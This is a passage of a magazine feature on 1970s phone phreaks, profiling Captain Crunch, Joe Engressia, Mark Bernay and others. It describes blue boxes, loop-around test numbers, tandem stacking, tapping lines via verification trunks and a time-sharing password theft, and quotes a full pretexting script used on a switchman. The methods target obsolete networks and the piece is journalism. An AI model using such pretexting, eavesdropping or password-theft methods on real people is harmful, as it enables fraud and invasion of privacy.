cable out of his bus, hook it onto the phone and sit for hours, days sometimes,
sending calls zipping back and forth across the country, all over the
world...."

Back at my motel, I dialed the number he gave me for "Captain Crunch" and asked
for G---- T-----, his real name, or at least the name he uses when he's not
dashing into a phone booth beeping out M-F tones faster than a speeding bullet
and zipping phantomlike through the phone company's long-distance lines.

When G---- T----- answered the phone and I told him I was preparing a story for
Esquire about phone phreaks, he became very indignant.

"I don't do that.  I don't do that anymore at all.  And if I do it, I do it for
one reason and one reason only.  I'm learning about a system.  The phone
company is a System.  A computer is a System, do you understand?  If I do what
I do, it is only to explore a system. Computers, systems, that's my bag.  The
phone company is nothing but a computer."

A tone of tightly restrained excitement enters the Captain's voice when he
starts talking about systems.  He begins to pronounce each syllable with the
hushed deliberation of an obscene caller.

"Ma Bell is a system I want to explore.  It's a beautiful system, you know, but
Ma Bell screwed up.  It's terrible because Ma Bell is such a beautiful system,
but she screwed up.  I learned how she screwed up from a couple of blind kids
who wanted me to build a device.  A certain device.  They said it could make
free calls.  I wasn't interested in free calls.  But when these blind kids told
me I could make calls into a computer, my eyes lit up.  I wanted to learn about
computers.  I wanted to learn about Ma Bell's computers.  So I build the little
device, but I built it wrong and Ma Bell found out.  Ma Bell can detect things
like that.  Ma Bell knows.  So I'm strictly rid of it now.  I don't do it.
Except for learning purposes."  He pauses. "So you want to write an article.
Are you paying for this call?  Hang up and call this number."  He gives me a
number in a area code a thousand miles away of his own.  I dial the number.

"Hello again.  This is Captain Crunch.  You are speaking to me on a toll-free
loop-around in Portland, Oregon.  Do you know what a toll-free loop around is?
I'll tell you.

He explains to me that almost every exchange in the country has open test
numbers which allow other exchanges to test their connections with it.  Most of
these numbers occur in consecutive pairs, such as 302 956-0041 and 302
956-0042.  Well, certain phone phreaks discovered that if two people from
anywhere in the country dial the two consecutive numbers they can talk together
just as if one had called the other's number, with no charge to either of them,
of course.

"Now our voice is looping around in a 4A switching machine up there in Canada,
zipping back down to me," the Captain tells me.  "My voice is looping around up
there and back down to you.  And it can't ever cost anyone money.  The phone
phreaks and I have compiled a list of many many of these numbers.  You would be
surprised if you saw the list.  I could show it to you.  But I won't.  I'm out
of that now.  I'm not out to screw Ma Bell.  I know better.  If I do anything
it's for the pure knowledge of the System.  You can learn to do fantastic
things.  Have you ever heard eight tandems stacked up?  Do you know the sound
of tandems stacking and unstacking?  Give me your phone number.  Okay. Hang up
now and wait a minute."

Slightly less than a minute later the phone rang and the Captain was on the
line, his voice sounding far more excited, almost aroused.

"I wanted to show you what it's like to stack up tandems.  To stack up
tandems." (Whenever the Captain says "stack up" it sounds as if he is licking
his lips.)

"How do you like the connection you're on now?" the Captain asks me. "It's a
raw tandem.  A raw tandem.  Ain't nothin' up to it but a tandem.  Now I'm going
to show you what it's like to stack up.  Blow off.  Land in a far away place.
To stack that tandem up, whip back and forth across the country a few times,
then shoot on up to Moscow.

"Listen," Captain Crunch continues.  "Listen.  I've got line tie on my
switchboard here, and I'm gonna let you hear me stack and unstack tandems.
Listen to this.  It's gonna blow your mind."

First I hear a super rapid-fire pulsing of the flutelike phone tones, then a
pause, then another popping burst of tones, then another, then another.  Each
burst is followed by a beep-kachink sound.

"We have now stacked up four tandems," said Captain Crunch, sounding somewhat
remote.  "That's four tandems stacked up.  Do you know what that means?  That
means I'm whipping back and forth, back and forth twice, across the country,
before coming to you.  I've been known to stack up twenty tandems at a time.
Now, just like I said, I'm going to shoot up to Moscow."

There is a new, longer series of beeper pulses over the line, a brief silence,
then a ring.

"Hello," answers a far-off voice.

"Hello.  Is this the American Embassy Moscow?"

"Yes, sir.  Who is this calling?" says the voice.

"Yes.  This is test board here in New York.  We're calling to check out the
circuits, see what kind of lines you've got.  Everything okay there in
Moscow?"

"Okay?"

"Well, yes, how are things there?"

"Oh.  Well, everything okay, I guess."

"Okay.  Thank you."

They hang up, leaving a confused series of beep-kachink sounds hanging in
mid-ether in the wake of the call before dissolving away.

The Captain is pleased.  "You believe me now, don't you?  Do you know what I'd
like to do?  I'd just like to call up your editor at Esquire and show him just
what it sounds like to stack and unstack tandems. I'll give him a show that
will blow his mind.  What's his number?

I ask the Captain what kind of device he was using to accomplish all his feats.
The Captain is pleased at the question.

"You could tell it was special, couldn't you?"  Ten pulses per second. That's
faster than the phone company's equipment.  Believe me, this unit is the most
famous unit in the country.  There is no other unit like it.  Believe me."

"Yes, I've heard about it.  Some other phone phreaks have told me about it."

"They have been referring to my, ahem, unit?  What is it they said? Just out of
curiosity, did they tell you it was a highly sophisticated computer-operated
unit, with acoustical coupling for receiving outputs and a switch-board with
multiple-line-tie capability?  Did they tell you that the frequency tolerance
is guaranteed to be not more than .05 percent?  The amplitude tolerance less
than .01 decibel?  Those pulses you heard were perfect.  They just come faster
than the phone company. Those were high-precision op-amps.  Op-amps are
instrumentation amplifiers designed for ultra-stable amplification, super-low
distortion and accurate frequency response.  Did they tell you it can operate
in temperatures from -55 degrees C to +125 degrees C?"

I admit that they did not tell me all that.

"I built it myself," the Captain goes on.  "If you were to go out and buy the
components from an industrial wholesaler it would cost you at least $1500.  I
once worked for a semiconductor company and all this didn't cost me a cent.  Do
you know what I mean?  Did they tell you about how I put a call completely
around the world?  I'll tell you how I did it.  I M-Fed Tokyo inward, who
connected me to India, India connected me to Greece, Greece connected me to
Pretoria, South Africa, South Africa connected me to South America, I went from
South America to London, I had a London operator connect me to a New York
operator, I had New York connect me to a California operator who rang the phone
next to me.  Needless to say I had to shout to hear myself.  But the echo was
far out.  Fantastic.  Delayed.  It was delayed twenty seconds, but I could hear
myself talk to myself."

"You mean you were speaking into the mouthpiece of one phone sending your voice
around the world into your ear through a phone on the other side of your head?"
I asked the Captain.  I had a vision of something vaguely autoerotic going on,
in a complex electronic way.

"That's right," said the Captain.  "I've also sent my voice around the world
one way, going east on one phone, and going west on the other, going through
cable one way, satellite the other, coming back together at the same time,
ringing the two phones simultaneously and picking them up and whipping my
voice both ways around the world back to me. Wow.  That was a mind blower."

"You mean you sit there with both phones on your ear and talk to yourself
around the world," I said incredulously.

"Yeah.  Um hum.  That's what I do.  I connect the phone together and sit there
and talk."

"What do you say?  What do you say to yourself when you're connected?"

"Oh, you know.  Hello test one two three," he says in a low-pitched voice.

"Hello test one two three," he replied to himself in a high-pitched voice.

"Hello test one two three," he repeats again, low-pitched.

"Hello test one two three," he replies, high-pitched.

"I sometimes do this: Hello Hello Hello Hello, Hello, hello," he trails off and
breaks into laughter.

Why Captain Crunch Hardly Ever Taps Phones Anymore

Using internal phone-company codes, phone phreaks have learned a simple method
for tapping phones.  Phone-company operators have in front of them a board that
holds verification jacks.  It allows them to plug into conversations in case of
emergency, to listen in to a line to determine if the line is busy or the
circuits are busy.  Phone phreaks have learned to beep out the codes which lead
them to a verification operator, tell the verification operator they are
switchmen from some other area code testing out verification trunks. Once the
operator hooks them into the verification trunk, they disappear into the board
for all practical purposes, slip unnoticed into any one of the 10,000 to
100,000 numbers in that central office without the verification operator
knowing what they're doing, and of course without the two parties to the
connection knowing there is a phantom listener present on their line.

Toward the end of my hour-long first conversation with him, I asked the Captain
if he ever tapped phones.

"Oh no.  I don't do that.  I don't think it's right," he told me firmly.  "I
have the power to do it but I don't... Well one time, just one time, I have to
admit that I did.  There was this girl, Linda, and I wanted to find out... you
know.  I tried to call her up for a date. I had a date with her the last
weekend and I thought she liked me.  I called her up, man, and her line was
busy, and I kept calling and it was still busy.  Well, I had just learned about
this system of jumping into lines and I said to myself, 'Hmmm.  Why not just
see if it works. It'll surprise her if all of a sudden I should pop up on her
line. It'll impress her, if anything.'  So I went ahead and did it.  I M-Fed
into the line.  My M-F-er is powerful enough when patched directly into the
mouthpiece to trigger a verification trunk without using an operator the way
the other phone phreaks have to.

"I slipped into the line and there she was talking to another boyfriend.
Making sweet talk to him.  I didn't make a sound because I was so disgusted.
So I waited there for her to hang up, listening to her making sweet talk to the
other guy.  You know.  So as soon as she hung up I instantly M-F-ed her up and
all I said was, 'Linda, we're through.'  And I hung up.  And it blew her head
off.  She couldn't figure out what the hell happened.

"But that was the only time.  I did it thinking I would surprise her, impress
her.  Those were all my intentions were, and well, it really kind of hurt me
pretty badly, and... and ever since then I don't go into verification trunks."

Moments later my first conversation with the Captain comes to a close.

"Listen," he says, his spirits somewhat cheered, "listen.  What you are going
to hear when I hang up is the sound of tandems unstacking. Layer after layer of
tandems unstacking until there's nothing left of the stack, until it melts away
into nothing.  Cheep, cheep, cheep, cheep," he concludes, his voice descending
to a whisper with each cheep.

He hangs up.  The phone suddenly goes into four spasms: kachink cheep. Kachink
cheep kachink cheep kachink cheep, and the complex connection has wiped itself
out like the Cheshire cat's smile.

The MF Boogie Blues

The next number I choose from the select list of phone-phreak alumni, prepared
for me by the blue-box inventor, is a Memphis number.  It is the number of Joe
Engressia, the first and still perhaps the most accomplished blind phone
phreak.

Three years ago Engressia was a nine-day wonder in newspapers and magazines all
over America because he had been discovered whistling free long-distance
connections for fellow students at the University of South Florida.  Engressia
was born with perfect pitch: he could whistle phone tones better than the
phone-company's equipment.

Engressia might have gone on whistling in the dark for a few friends for the
rest of his life if the phone company hadn't decided to expose him.  He was
warned, disciplined by the college, and the whole case became public.  In the
months following media reports of his talent, Engressia began receiving strange
calls.   There were calls from a group of kids in Los Angeles who could do some
very strange things with the quirky General Telephone and Electronics circuitry
in L.A. suburbs.  There were calls from a group of mostly blind kids in ----,
California, who had been doing some interesting experiments with Cap'n Crunch
whistles and test loops.  There was a group in Seattle, a group in Cambridge,
Massachusetts, a few from New York, a few scattered across the country.  Some
of them had already equipped themselves with cassette and electronic M-F
devices.  For some of these groups, it was the first time they knew of the
others.

The exposure of Engressia was the catalyst that linked the separate
phone-phreak centers together.  They all called Engressia.  They talked to him
about what he was doing and what they were doing.  And then he told them -- the
scattered regional centers and lonely independent phone phreakers -- about each
other, gave them each other's numbers to call, and within a year the scattered
phone-phreak centers had grown into a nationwide underground.

Joe Engressia is only twenty-two years old now, but along the phone-phreak
network he is "the old man," accorded by phone phreaks something of the
reverence the phone company bestows on Alexander Graham Bell.  He seldom needs
to make calls anymore.  The phone phreaks all call him and let him know what
new tricks, new codes, new techniques they have learned.  Every night he sits
like a sightless spider in his little apartment receiving messages from every
tendril of his web.  It is almost a point of pride with Joe that they call
him.

But when I reached him in his Memphis apartment that night, Joe Engressia was
lonely, jumpy and upset.

"God, I'm glad somebody called.  I don't know why tonight of all nights I don't
get any calls.  This guy around here got drunk again tonight and propositioned
me again.  I keep telling him we'll never see eye to eye on this subject, if
you know what I mean.  I try to make light of it, you know, but he doesn't get
it.  I can head him out there getting drunker and I don't know what he'll do
next.  It's just that I'm really all alone here, just moved to Memphis, it's
the first time I'm living on my own, and I'd hate for it to all collapse now.
But I won't go to bed with him.  I'm just not very interested in sex and even
if I can't see him I know he's ugly.

"Did you hear that?  That's him banging a bottle against the wall outside.
He's nice.  Well forget about it.  You're doing a story on phone phreaks?
Listen to this.  It's the MF Boogie Blues.

Sure enough, a jumpy version of Muskrat Ramble boogies its way over the line,
each note one of those long-distance phone tones.  The music stops.  A huge
roaring voice blasts the phone off my ear: "AND THE QUESTION IS..." roars the
voice, "CAN A BLIND PERSON HOOK UP AN AMPLIFIER ON HIS OWN?"

The roar ceases.  A high-pitched operator-type voice replaces it. "This is
Southern Braille Tel. & Tel.  Have tone, will phone."

This is succeeded by a quick series of M-F tones, a swift "kachink" and a deep
reassuring voice: "If you need home care, call the visiting-nurses association.
First National time in Honolulu is 4:32 p.m."

Joe back in his Joe voice again: "Are we seeing eye to eye? 'Si, si,' said the
blind Mexican.  Ahem.  Yes.  Would you like to know the weather in Tokyo?"

This swift manic sequence of phone-phreak vaudeville stunts and blind-boy jokes
manages to keep Joe's mind off his tormentor only as long as it lasts.

"The reason I'm in Memphis, the reason I have to depend on that homosexual guy,
is that this is the first time I've been able to live on my own and make phone
trips on my own.  I've been banned from all central offices around home in
Florida, they knew me too well, and at the University some of my fellow
scholars were always harassing me because I was on the dorm pay phone all the
time and making fun of me because of my fat ass, which of course I do have,
it's my physical fatness program, but I don't like to hear it every day, and if
I can't phone trip and I can't phone phreak, I can't imagine what I'd do, I've
been devoting three quarters of my life to it.

"I moved to Memphis because I wanted to be on my own as well as because it has
a Number 5 crossbar switching system and some interesting little independent
phone-company districts nearby and so far they don't seem to know who I am so I
can go on phone tripping, and for me phone tripping is just as important as
phone phreaking."

Phone tripping, Joe explains, begins with calling up a central-office switch
room.  He tells the switchman in a polite earnest voice that he's a blind
college student interested in telephones, and could he perhaps have a guided
tour of the switching station?  Each step of the tour Joe likes to touch and
feel relays, caress switching circuits, switchboards, crossbar arrangements.

So when Joe Engressia phone phreaks he feels his way through the circuitry of
the country garden of forking paths, he feels switches shift, relays shunt,
crossbars swivel, tandems engage and disengage even as he hears -- with perfect
pitch -- his M-F pulses make the entire Bell system dance to his tune.

Just one month ago Joe took all his savings out of his bank and left home, over
the emotional protests of his mother.  "I ran away from home almost," he likes
to say.  Joe found a small apartment house on Union Avenue and began making
phone trips.  He'd take a bus a hundred miles south in Mississippi to see some
old-fashioned Bell equipment still in use in several states, which had been
puzzling.  He'd take a bus three hundred miles to Charlotte, North Carolina, to
look at some brand-new experimental equipment.  He hired a taxi to drive him
twelve miles to a suburb to tour the office of a small phone company with some
interesting idiosyncrasies in its routing system.  He was having the time of
his life, he said, the most freedom and pleasure he had known.

In that month he had done very little long-distance phone phreaking from his
own phone.  He had begun to apply for a job with the phone company, he told me,
and he wanted to stay away from anything illegal.

"Any kind of job will do, anything as menial as the most lowly operator.
That's probably all they'd give me because I'm blind.  Even though I probably
know more than most switchmen.  But that's okay.  I want to work for Ma Bell.
I don't hate Ma Bell the way Gilbertson and some phone phreaks do.  I don't
want to screw Ma Bell.  With me it's the pleasure of pure knowledge.  There's
something beautiful about the system when you know it intimately the way I do.
But I don't know how much they know about me here.  I have a very intuitive
feel for the condition of the line I'm on, and I think they're monitoring me
off and on lately, but I haven't been doing much illegal.  I have to make a few
calls to switchmen once in a while which aren't strictly legal, and once I took
an acid trip and was having these auditory hallucinations as if I were trapped
and these planes were dive-bombing me, and all of sudden I had to phone phreak
out of there.  For some reason I had to call Kansas City, but that's all."

A Warning Is Delivered

At this point -- one o'clock in my time zone -- a loud knock on my motel-room
door interrupts our conversation.  Outside the door I find a uniformed security
guard who informs me that there has been an "emergency phone call" for me while
I have been on the line and that the front desk has sent him up to let me
know.

Two seconds after I say good-bye to Joe and hang up, the phone rings.

"Who were you talking to?" the agitated voice demands.  The voice belongs to
Captain Crunch.  "I called because I decided to warn you of something.  I
decided to warn you to be careful.  I don't want this information you get to
get to the radical underground.  I don't want it to get into the wrong hands.
What would you say if I told you it's possible for three phone phreaks to
saturate the phone system of the nation.  Saturate it.  Busy it out.  All of
it.  I know how to do this.  I'm not gonna tell.  A friend of mine has already
saturated the trunks between Seattle and New York.  He did it with a
computerized M-F-er hitched into a special Manitoba exchange.  But there are
other, easier ways to do it."

Just three people?  I ask.  How is that possible?

"Have you ever heard of the long-lines guard frequency?  Do you know about
stacking tandems with 17 and 2600?  Well, I'd advise you to find out about it.
I'm not gonna tell you.  But whatever you do, don't let this get into the hands
of the radical underground."

(Later Gilbertson, the inventor, confessed that while he had always been
skeptical about the Captain's claim of the sabotage potential of trunk-tying
phone phreaks, he had recently heard certain demonstrations which convinced him
the Captain was not speaking idly. "I think it might take more than three
people, depending on how many machines like Captain Crunch's were available.
But even though the Captain sounds a little weird, he generally turns out to
know what he's talking about.")

"You know," Captain Crunch continues in his admonitory tone, "you know the
younger phone phreaks call Moscow all the time.  Suppose everybody were to call
Moscow.  I'm no right-winger.  But I value my life.  I don't want the Commies
coming over and dropping a bomb on my head. That's why I say you've got to be
careful about who gets this information."

The Captain suddenly shifts into a diatribe against those phone phreaks who
don't like the phone company.

"They don't understand, but Ma Bell knows everything they do.  Ma Bell knows.
Listen, is this line hot?  I just heard someone tap in.  I'm not paranoid, but
I can detect things like that.  Well, even if it is, they know that I know that
they know that I have a bulk eraser.  I'm very clean."  The Captain pauses,
evidently torn between wanting to prove to the phone-company monitors that he
does nothing illegal, and the desire to impress Ma Bell with his prowess.  "Ma
Bell knows how good I am.  And I am quite good.  I can detect reversals, tandem
switching, everything that goes on on a line.  I have relative pitch now.  Do
you know what that means?  My ears are a $20,000 piece of equipment.  With my
ears I can detect things they can't hear with their equipment.  I've had
employment problems.  I've lost jobs.  But I want to show Ma Bell how good I
am.  I don't want to screw her, I want to work for her.  I want to do good for
her.  I want to help her get rid of her flaws and become perfect.  That's my
number-one goal in life now."  The Captain concludes his warnings and tells me
he has to be going.  "I've got a little action lined up for tonight," he
explains and hangs up.

Before I hang up for the night, I call Joe Engressia back.  He reports that his
tormentor has finally gone to sleep -- "He's not blind drunk, that's the way I
get, ahem, yes; but you might say he's in a drunken stupor."  I make a date to
visit Joe in Memphis in two days.

A Phone Phreak Call Takes Care of Business

The next morning I attend a gathering of four phone phreaks in  ----- (a
California suburb).  The gathering takes place in a comfortable split-level
home in an upper-middle-class subdivision.  Heaped on the kitchen table are the
portable cassette recorders, M-F cassettes, phone patches, and line ties of the
four phone phreaks present.  On the kitchen counter next to the telephone is a
shoe-box-size blue box with thirteen large toggle switches for the tones.  The
parents of the host phone phreak, Ralph, who is blind, stay in the living room
with their sighted children.  They are not sure exactly what Ralph and his
friends do with the phone or if it's strictly legal, but he is blind and they
are pleased he has a hobby which keeps him busy.

The group has been working at reestablishing the historic "2111" conference,
reopening some toll-free loops, and trying to discover the dimensions of what
seem to be new initiatives against phone phreaks by phone-company security
agents.

It is not long before I get a chance to see, to hear, Randy at work. Randy is
known among the phone phreaks as perhaps the finest con man in the game.  Randy
is blind.  He is pale, soft and pear-shaped, he wears baggy pants and a wrinkly
nylon white sport shirt, pushes his head forward from hunched shoulders
somewhat like a turtle inching out of its shell.  His eyes wander, crossing and
recrossing, and his forehead is somewhat pimply.  He is only sixteen years
old.

But when Randy starts speaking into a telephone mouthpiece his voice becomes so
stunningly authoritative it is necessary to look again to convince yourself it
comes from a chubby adolescent Randy.  Imagine the voice of a crack oil-rig
foreman, a tough, sharp, weather-beaten Marlboro man of forty.  Imagine the
voice of a brilliant performance-fund gunslinger explaining how he beats the
Dow Jones by thirty percent.  Then imagine a voice that could make those two
sound like Stepin Fetchit.  That is sixteen-year-old Randy's voice.

He is speaking to a switchman in Detroit.  The phone company in Detroit had
closed up two toll-free loop pairs for no apparent reason, although heavy use
by phone phreaks all over the country may have been detected.  Randy is telling
the switchman how to open up the loop and make it free again:

"How are you, buddy.  Yeah. I'm on the board in here in Tulsa, Oklahoma, and
we've been trying to run some tests on your loop-arounds and we find'em busied
out on both sides.... Yeah, we've been getting a 'BY' on them, what d'ya say,
can you drop cards on 'em?  Do you have 08 on your number group?  Oh that's
okay, we've had this trouble before, we may have to go after the circuit.  Here
lemme give 'em to you: your frame is 05, vertical group 03, horizontal 5,
vertical file 3.  Yeah, we'll hang on here.... Okay, found it?  Good.  Right,
yeah, we'd like to clear that busy out.  Right.  All you have to do is look for
your key on the mounting plate, it's in your miscellaneous trunk frame.  Okay?
Right.  Now pull your key from NOR over the LCT.  Yeah. I don't know why that
happened, but we've been having trouble with that one.  Okay.  Thanks a lot
fella.  Be seein' ya."

Randy hangs up, reports that the switchman was a little inexperienced with the
loop-around circuits on the miscellaneous trunk frame, but that the loop has
been returned to its free-call status.

Delighted, phone phreak Ed returns the pair of numbers to the active-status
column in his directory.  Ed is a superb and painstaking researcher.  With
almost Talmudic thoroughness he will trace tendrils of hints through soft-wired
mazes of intervening phone-company circuitry back through complex linkages of
switching relays to find the location and identity of just one toll-free loop.
He spends hours and hours, every day, doing this sort of thing.  He has somehow
compiled a directory of eight hundred "Band-six in-WATS numbers" located in
over forty states.  Band-six in-WATS numbers are the big 800 numbers -- the
ones that can be dialed into free from anywhere in the country.

Ed the researcher, a nineteen-year-old engineering student, is also a superb
technician.  He put together his own working blue box from scratch at age
seventeen.  (He is sighted.)  This evening after distributing the latest issue
of his in-WATS directory (which has been typed into Braille for the blind phone
phreaks), he announces he has made a major new breakthrough:

"I finally tested it and it works, perfectly. I've got this switching matrix
which converts any touch-tone phone into an M-F-er."

The tones you hear in touch-tone phones are not the M-F tones that operate the
long-distance switching system.  Phone phreaks believe A.T.&T. had deliberately
equipped touch tones with a  different set of frequencies to avoid putting the
six master M-F tones in the hands of every touch-tone owner.  Ed's complex
switching matrix puts the six master tones, in effect put a blue box, in the
hands of every touch-tone owner.

Ed shows me pages of schematics, specifications and parts lists. "It's not easy
to build, but everything here is in the Heathkit catalog."

Ed asks Ralph what progress he has made in his attempts to reestablish a
long-term open conference line for phone phreaks.  The last big conference --
the historic "2111" conference -- had been arranged through an unused Telex
test-board trunk somewhere in the innards of a 4A switching machine in
Vancouver, Canada.  For months phone phreaks could M-F their way into
Vancouver, beep out 604 (the Vancouver area code) and then beep out 2111 (the
internal phone-company code for Telex testing), and find themselves at any
time, day or night, on an open wire talking with an array of phone phreaks from
coast to coast, operators from Bermuda, Tokyo and London who are phone-phreak
sympathizers, and miscellaneous guests and technical experts.  The conference
was a massive exchange of information.  Phone phreaks picked each other's
brains clean, then developed new ways to pick the phone company's brains clean.
Ralph gave M F Boogies concerts with his home-entertainment-type electric
organ, Captain Crunch demonstrated his round-the-world prowess with his
notorious computerized unit and dropped leering hints of the "action" he was
getting with his girl friends.  (The Captain lives out or pretends to live out
several kinds of fantasies to the gossipy delight of the blind phone phreaks
who urge him on to further triumphs on behalf of all of them.)  The somewhat
rowdy Northwest phone-phreak crowd let their bitter internal feud spill over
into the peaceable conference line, escalating shortly into guerrilla warfare;
Carl the East Coast international tone relations expert demonstrated newly
opened direct M-F routes to central offices on the island of Bahrein in the
Persian Gulf, introduced a new phone-phreak friend of his in Pretoria, and
explained the technical operation of the new Oakland-to Vietnam linkages.
(Many phone phreaks pick up spending money by M-F-ing calls from relatives to
Vietnam G.I.'s, charging $5 for a whole hour of trans-Pacific conversation.)

Day and night the conference line was never dead.  Blind phone phreaks all over
the country, lonely and isolated in homes filled with active sighted brothers
and sisters, or trapped with slow and unimaginative blind kids in straitjacket
schools for the blind, knew that no matter how late it got they could dial up
the conference and find instant electronic communion with two or three other
blind kids awake over on the other side of America.  Talking together on a
phone hookup, the blind phone phreaks say, is not much different from being
there together. Physically, there was nothing more than a two-inch-square wafer
of titanium inside a vast machine on Vancouver Island.  For the blind kids
>there< meant an exhilarating feeling of being in touch, through a kind of
skill and magic which was peculiarly their own.

Last April 1, however, the long Vancouver Conference was shut off. The phone
phreaks knew it was coming.  Vancouver was in the process of converting from a
step-by-step system to a 4A machine and the 2111 Telex circuit was to be wiped
out in the process.  The phone phreaks learned the actual day on which the
conference would be erased about a week ahead of time over the phone company's
internal-news-and-shop-talk recording.

For the next frantic seven days every phone phreak in America was on and off
the 2111 conference twenty-four hours a day.  Phone phreaks who were just
learning the game or didn't have M-F capability were boosted up to the
conference by more experienced phreaks so they could get a glimpse of what it
was like before it disappeared.  Top phone phreaks searched distant area codes
for new conference possibilities without success.  Finally in the early morning
of April 1, the end came.

"I could feel it coming a couple hours before midnight," Ralph remembers.  "You
could feel something going on in the lines.  Some static began showing up, then
some whistling wheezing sound.  Then there were breaks.  Some people got cut
off and called right back in, but after a while some people were finding they
were cut off and couldn't get back in at all.  It was terrible.  I lost it
about one a.m., but managed to slip in again and stay on until the thing
died... I think it was about four in the morning.  There were four of us still
hanging on when the conference disappeared into nowhere for good.  We all tried
to M-F up to it again of course, but we got silent termination.  There was
nothing there."

The Legendary Mark Bernay Turns Out To Be "The Midnight Skulker"

Mark Bernay.  I had come across that name before.  It was on Gilbertson's
select list of phone phreaks.  The California phone phreaks had spoken of a
mysterious Mark Bernay as perhaps the first and oldest phone phreak on the West
Coast.  And in fact almost every phone phreak in the West can trace his origins
either directly to Mark Bernay or to a disciple of Mark Bernay.

It seems that five years ago this Mark Bernay (a pseudonym he chose for
himself) began traveling up and down the West Coast pasting tiny stickers in
phone books all along his way.  The stickers read something like "Want to hear
an interesting tape recording? Call these numbers."  The numbers that followed
were toll-free loop-around pairs. When one of the curious called one of the
numbers he would hear a tape recording pre-hooked into the loop by Bernay which
explained the use of loop-around pairs, gave the numbers of several more, and
ended by telling the caller, "At six o'clock tonight this recording will stop
and you and your friends can try it out.  Have fun."

"I was disappointed by the response at first," Bernay told me, when I finally
reached him at one of his many numbers and he had dispensed with the usual "I
never do anything illegal" formalities which experienced phone phreaks open
most conversations.

"I went all over the coast with these stickers not only on pay phones, but I'd
throw them in front of high schools in the middle of the night, I'd leave them
unobtrusively in candy stores, scatter them on main streets of small towns.  At
first hardly anyone bothered to try it out.  I would listen in for hours and
hours after six o'clock and no one came on.  I couldn't figure out why people
wouldn't be interested.  Finally these two girls in Oregon tried it out and
told all their friends and suddenly it began to spread."

Before his Johny Appleseed trip Bernay had already gathered a sizable group of
early pre-blue-box phone phreaks together on loop-arounds in Los Angeles.
Bernay does not claim credit for the original discovery of the loop-around
numbers.  He attributes the discovery to an eighteen-year-old reform school kid
in Long Beach whose name he forgets and who, he says, "just disappeared one
day."  When Bernay himself discovered loop-arounds independently, from clues in
his readings in old issues of the Automatic Electric Technical Journal, he
found dozens of the reform-school kid's friends already using them. However, it
was one of Bernay's disciples in Seattle that introduced phone phreaking to
blind kids.  The Seattle kid who learned about loops through Bernay's recording
told a blind friend, the blind kid taught the secret to his friends at a winter
camp for blind kids in Los Angeles.  When the camp session was over these kids
took the secret back to towns all over the West.  This is how the original
blind kids became phone phreaks.  For them, for most phone phreaks in general,
it was the discovery of the possibilities of loop-arounds which led them on to
far more serious and sophisticated phone-phreak methods, and which gave them a
medium for sharing their discoveries.

A year later a blind kid who moved back east brought the technique to a blind
kids' summer camp in Vermont, which spread it along the East Coast.  All from a
Mark Bernay sticker.

Bernay, who is nearly thirty years old now, got his start when he was fifteen
and his family moved into an L.A. suburb serviced by General Telephone and
Electronics equipment.  He became fascinated with the differences between Bell
and G.T.&E. equipment.  He learned he could make interesting things happen by
carefully timed clicks with the disengage button.  He learned to interpret
subtle differences in the array of clicks, whirrs and kachinks he could hear on
his lines.  He learned he could shift himself around the switching relays of
the L.A. area code in a not-too-predictable fashion by interspersing his own
hook-switch clicks with the clicks within the line. (Independent phone
companies -- there are nineteen hundred of them still left, most of them tiny
island principalities in Ma Bell's vast empire -- have always been favorites
with phone phreaks, first as learning tools, then as Archimedes platforms from
which to manipulate the huge Bell system.  A phone phreak in Bell territory
will often M-F himself into an independent's switching system, with switching
idiosyncrasies which can give him marvelous leverage over the Bell System.

"I have a real affection for Automatic Electric Equipment," Bernay told me.
"There are a lot of things you can play with.  Things break down in interesting
ways."

Shortly after Bernay graduated from college (with a double major in chemistry
and philosophy), he graduated from phreaking around with G.T.&E. to the Bell
System itself, and made his legendary sticker-pasting journey north along the
coast, settling finally in Northwest Pacific Bell territory.  He discovered
that if Bell does not break down as interestingly as G.T.&E., it nevertheless
offers a lot of "things to play with."

Bernay learned to play with blue boxes.  He established his own personal
switchboard and phone-phreak research laboratory complex.  He continued his
phone-phreak evangelism with ongoing sticker campaigns. He set up two recording
numbers, one with instructions for beginning phone phreaks, the other with
latest news and technical developments (along with some advanced instruction)
gathered from sources all over the country.

These days, Bernay told me, he had gone beyond phone-phreaking itself. "Lately
I've been enjoying playing with computers more than playing with phones.  My
personal thing in computers is just like with phones, I guess -- the kick is in
finding out how to beat the system, how to get at things I'm not supposed to
know about, how to do things with the system that I'm not supposed to be able
to do."

As a matter of fact, Bernay told me, he had just been fired from his
computer-programming job for doing things he was not supposed to be able to do.
he had been working with a huge time-sharing computer owned by a large
corporation but shared by many others.  Access to the computer was limited to
those programmers and corporations that had been assigned certain passwords.
And each password restricted its user to access to only the one section of the
computer cordoned off from its own information storager.  The password system
prevented companies and individuals from stealing each other's information.

"I figured out how to write a program that would let me read everyone else's
password," Bernay reports.  "I began playing around with passwords.  I began
letting the people who used the computer know, in subtle ways, that I knew
their passwords.  I began dropping notes to the computer supervisors with hints
that I knew what I know. I signed them 'The Midnight Skulker.'  I kept getting
cleverer and cleverer with my messages and devising ways of showing them what I
could do. I'm sure they couldn't imagine I could do the things I was showing
them.  But they never responded to me.  Every once in a while they'd change the
passwords, but I found out how to discover what the new ones were, and I let
them know.  But they never responded directly to the Midnight Skulker.  I even
finally designed a program which they could use to prevent my program from
finding out what it did.  In effect I told them how to wipe me out, The
Midnight Skulker.  It was a very clever program.  I started leaving clues about
myself.  I wanted them to try and use it and then try to come up with something
to get around that and reappear again.  But they wouldn't play.  I wanted to
get caught.  I mean I didn't want to get caught personally, but I wanted them
to notice me and admit that they noticed me.  I wanted them to attempt to
respond, maybe in some interesting way."
Finally the computer managers became concerned enough about the threat of
information-stealing to respond.  However, instead of using The Midnight
Skulker's own elegant self-destruct program, they called in their security
personnel, interrogated everyone, found an informer to identify Bernay as The
Midnight Skulker, and fired him.

"At first the security people advised the company to hire me full-time to
search out other flaws and discover other computer freaks.  I might have liked
that.  But I probably would have turned into a double double agent rather than
the double agent they wanted.  I might have resurrected The Midnight Skulker
and tried to catch myself.  Who knows?  Anyway, the higher-ups turned the whole
idea down."

You Can Tap the F.B.I.'s Crime Control Computer in the Comfort of Your Own
Home, Perhaps

Computer freaking may be the wave of the future.  It suits the phone-phreak
sensibility perfectly.  Gilbertson, the blue-box inventor and a lifelong phone
phreak, has also gone on from phone-phreaking to computer-freaking.  Before he
got into the blue-box business Gilbertson, who is a highly skilled programmer,
devised programs for international currency arbitrage.

But he began playing with computers in earnest when he learned he could use his
blue box in tandem with the computer terminal installed in his apartment by the
instrumentation firm he worked for.  The print-out terminal and keyboard was
equipped with acoustical coupling, so that by coupling his little ivory
Princess phone to the terminal and then coupling his blue box on that, he could
